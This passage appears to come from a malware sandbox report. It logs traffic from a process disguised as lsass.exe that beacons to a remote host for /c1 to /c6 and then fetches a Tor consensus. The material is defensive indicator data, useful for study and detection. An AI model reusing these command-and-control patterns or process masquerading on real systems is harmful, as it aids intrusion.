9b 21 5c ec f7 be 44 e8 ba f3 4f 7a 5a 7d b1 fc f4 4b fd bb ec 4b 1e 7f 41 0b 06 9d 92 e6 73 9a 8f 7b d9 af 78 97 f0 4d bb 7e e7 d4 ba fc ea e8 7e 58 a0 03 40 27 c6 cb d0 7b fe 9a 25 68 29 5b bf 66 79 9c da e8 94 c6 e8 6a 0b 63 f4 8b fa e8 b3 c0 8f 7e 8d d0 43 bf 26 36 ba e0 d0 d3 6c 13 bd 94 e4 d1 07 bf f7 4c 74 d6 42 1b 3f df b4 eb 25 4e 12 c8 49 5b 27 fb 57 fb 84 ac 87 ce f8 af 2f 5b d6 bf c1 bf 32 4f af 3d 8c 1e 59 e8 20 ec 8b 1f e3 00 42 0f 0b 9b e0 88 bc 9d 70 b9 7d 1c f6 38 6b 61 fa 07 f2 b0 1f 2d 4b 36 5f 8e af 5d c9 4f 1c 8b a1 b8 64 99 d0 92 7e 0d fe fd e6 9d 5e ae b1 Data Ascii: xis?HH&sx4h~D3A7lluWweYMsky,"r#%fevrs/=S}vJP$ ;$IRDyyy>~~P$>qO/z\|C}Caa;D/wws/%)?8fXyEH^ozBO-)~JL\|YV4V-J"ELhn6VhIl(^$Jm3>//+ I<60#;"K7?uQ/tf[/]o_K[f7}?C\|~~~z^&UWy6SfWL_wIfFW5X{yz.HG^1Mkd=e-,9FLSdohD}EGGR-a0PFm![h#s#3!28MWqm87@Xg,^m:2q[L5MiU]tYFNzN_(1S_Q~5(C"F=:Q!Wv=?v<Gn?y>\|DhW?>@A0a\ok(-tE~]fF!+~9!\DOzZ}KKAs{xM~~X@'{%h)[fyjc~C&6lLtB?%NI['W/[2O=Y Bp}8ka-K6_]Od~^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49747	185.215.113.93	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:40:34.265763998 CET	170	OUT	GET /c1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:40:34.508837938 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:40:34 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49748	185.215.113.93	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:40:35.766335964 CET	170	OUT	GET /c2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:40:36.009268999 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:40:35 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49749	185.215.113.93	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:40:37.262275934 CET	170	OUT	GET /c3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:40:37.505966902 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:40:37 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49750	185.215.113.93	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:40:38.761794090 CET	170	OUT	GET /c4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:40:39.004462004 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:40:38 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49751	185.215.113.93	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:40:40.262161970 CET	170	OUT	GET /c5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:40:40.505892038 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:40:40 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49752	185.215.113.93	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:40:41.772838116 CET	170	OUT	GET /c6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Host: 185.215.113.93
Jan 10, 2024 15:40:42.014041901 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 10 Jan 2024 14:40:41 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49756	199.58.81.140	80	4596	C:\180771693628709\lsass.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2024 15:41:30.793708086 CET	141	OUT	GET /tor/status-vote/current/consensus.z HTTP/1.1 Accept-Encoding: gzip Host: 199.58.81.140 Connection: Close Cache-Control: no-cache
Jan 10, 2024 15:41:30.905777931 CET	1286	IN	HTTP/1.0 200 OK Date: Wed, 10 Jan 2024 14:41:30 GMT Content-Type: text/plain X-Your-Address-Is: 102.165.48.42 Content-Encoding: deflate Expires: Wed, 10 Jan 2024 15:00:00 GMT Vary: X-Or-Diff-From-Consensus Data Raw: 78 da ec fd 69 73 a3 c8 b6 05 0c 7f 3f bf 82 ef ea b2 48 48 26 c5 73 9e 78 98 34 cf 68 7e e3 44 07 33 08 04 88 41 08 fd fa 37 13 bb aa 6c 6c 75 57 77 9f be d7 a5 db 15 65 59 b6 06 8b 4d b2 73 0f 6b af 15 d9 79 19 a7 c1 97 2c d7 f3 22 fb 72 b1 d3 cc 8f 23 82 fe d7 25 ce ed 97 df 12 66 1c 65 76 94 15 d9 bf be dd fb 72 b2 73 2f b6 08 1a 3d 53 0f 7d eb 8b ee e4 76 4a 50 24 05 bf 90 e0 0b 20 09 00 3b 24 89 fe ff cb 49 ed cc fb 52 44 b9 1f be 79 9c 79 79 fc f9 f5 ef 1f e7 be 3e 1e e7 7e e4 7e b1 ec 50 af 08 9a 24 f1 d7 bf cc d0 b7 a3 fc eb e7 cd 08 f2 09 3e 71 4f dc 2f cf df f9 97 ef 80 fc 7a 07 7c bd 43 7d bd 43 7f bd 03 bf de 61 be de 61 eb 3b fc 13 f8 a2 87 89 a7 bf fc 44 bd f9 89 fe 92 9a 2f 77 e1 cb 77 e6 e5 fb d7 97 73 2f df f9 97 ef c2 d7 b7 25 ff 95 d9 29 fa e8 3f ed c7 0f a2 b8 8c be 38 a1 ee 66 84 58 a0 85 90 fa 79 45 48 ba a5 5e fd 9c a8 6f ba 7a 96 13 bd 42 4f 2d a2 af 29 7e 4a 4c 7c cb 0a ed 59 14 56 c4 34 56 2d f9 eb 4a 22 96 45 14 a1 13 4c 68 b9 6e 84 36 fe 16 da 8a 9d 99 84 56 19 68 49 6c 28 fc ea 0d 5e 24 ff 4a 6d 33 3e 9d ec c8 b2 ad 2f 2f 2b 20 49 e3 3c 36 e3 30 23 f0 3b fe 9b 22 f0 4b f1 37 3f 95 75 d3 b3 d1 dd fa ef d7 df 07 51 9e c6 ff 86 e8 de 12 bd 09 fa d5 d8 8f 82 7f c3 2f 0c fa 74 66 1a 5b cf 2f 5d e2 95 f6 6f ea cd 5f 4b f1 ef fe 5b 7f 0c df c1 66 fb 37 7d e7 ef 9e 0b 3f fd fd 43 7c 7e bf df 7e 8b ff c9 cf 9d e8 a9 7e 7a 5e 10 e8 bd 26 fa 55 ab 57 79 36 b7 53 d1 b2 d2 7f f3 84 ec a7 66 e1 e7 f3 d4 af 57 4c 5f 0f 9d d0 77 ec 49 66 9b ff 46 57 35 ba b6 95 58 7b 79 92 9c da 7a 8e 2e 0e a9 48 b3 fc df ec 47 0f a9 11 5e 31 d6 bf c1 07 8f 4d fc 08 1d 6b 64 9b f8 87 fa 90 df 3d 65 a9 e7 f6 cb 03 df 9e f9 f6 2d bf fd 1a 1d 0c fa c1 2c d2 14 9d 10 39 46 ce ea df 4c fd 89 96 b6 53 64 b6 86 d6 6f 68 f7 e3 44 ae cf 18 b6 9b 7d bb c4 45 86 de 47 bd e6 e8 47 a9 52 2d 8a 61 80 30 50 d0 ef 46 03 6d a5 21 bb 5b 68 ed 23 73 23 33 e9 21 32 ea b4 38 4d 57 71 6d b0 95 38 ff 37 40 f6 58 67 f6 2c c9 fd 93 9f e5 be a9 e8 b9 8e 5e 6d 94 3a 32 71 e2 5b f5 fd cc d4 d1 a7 4c 7f 35 4d f4 a3 69 e4 b9 9d e5 c8 e5 9e d1 cb 09 d3 fc 55 0f 5d 74 8c e8 8e 59 46 d6 af 4e 11 86 bf ba 7a 82 4e ef 9b 5f 9d fc 28 31 f3 7f 53 cc b7 5f fb 51 fd 7e df 7f fa 35 c5 e6 a2 bf ff 0e bd e6 df 80 aa df 28 43 1f 22 f9 d5 46 d7 3d 3a 51 e4 f7 df c4 11 b2 dd bf 21 57 bf ed c5 76 f5 ec d7 da 09 3d 3f 15 f0 ec f7 df 1b 76 ae bf 3c 9f e6 a8 ef bf 47 6e 3f 7f 79 3e fd 7c 44 af 7f ff f2 07 68 f8 fd 01 57 3f 9d be 3e 40 41 9e 30 9d eb af 61 5c d6 6f f1 6b ee e1 cd 28 0e 2d 74 fa f0 07 45 0b e2 d7 93 7e fd d5 b4 91 11 ce 85 5d d8 bf 66 fe cd 46 c7 c5 dc 7f f4 d7 b8 c8 f1 c9 21 09 2b ce 7e 8d 8a d3 af df 9e 89 1e 39 ff 9b 21 5c ec f7 be 44 e8 ba f3 4f 7a 5a 7d b1 fc f4 4b fd bb ec 4b 1e 7f 41 0b 06 9d 92 e6 73 9a 8f 7b d9 af 78 97 f0 4d bb 7e e7 d4 ba fc ea e8 7e 58 a0 03 40 27 c6 cb d0 7b fe 9a 25 68 29 5b bf 66 79 9c da e8 94 c6 e8 6a 0b 63 f4 8b fa e8 b3 c0 8f 7e 8d d0 43 bf 26 36 ba e0 d0 d3 6c 13 bd 94 e4 d1 07 bf f7 4c 74 d6 42 1b 3f df b4 eb 25 4e 12 c8 49 5b 27 fb 57 fb 84 ac 87 ce f8 af 2f 5b d6 bf c1 bf 32 4f af 3d 8c 1e 59 e8 20 ec 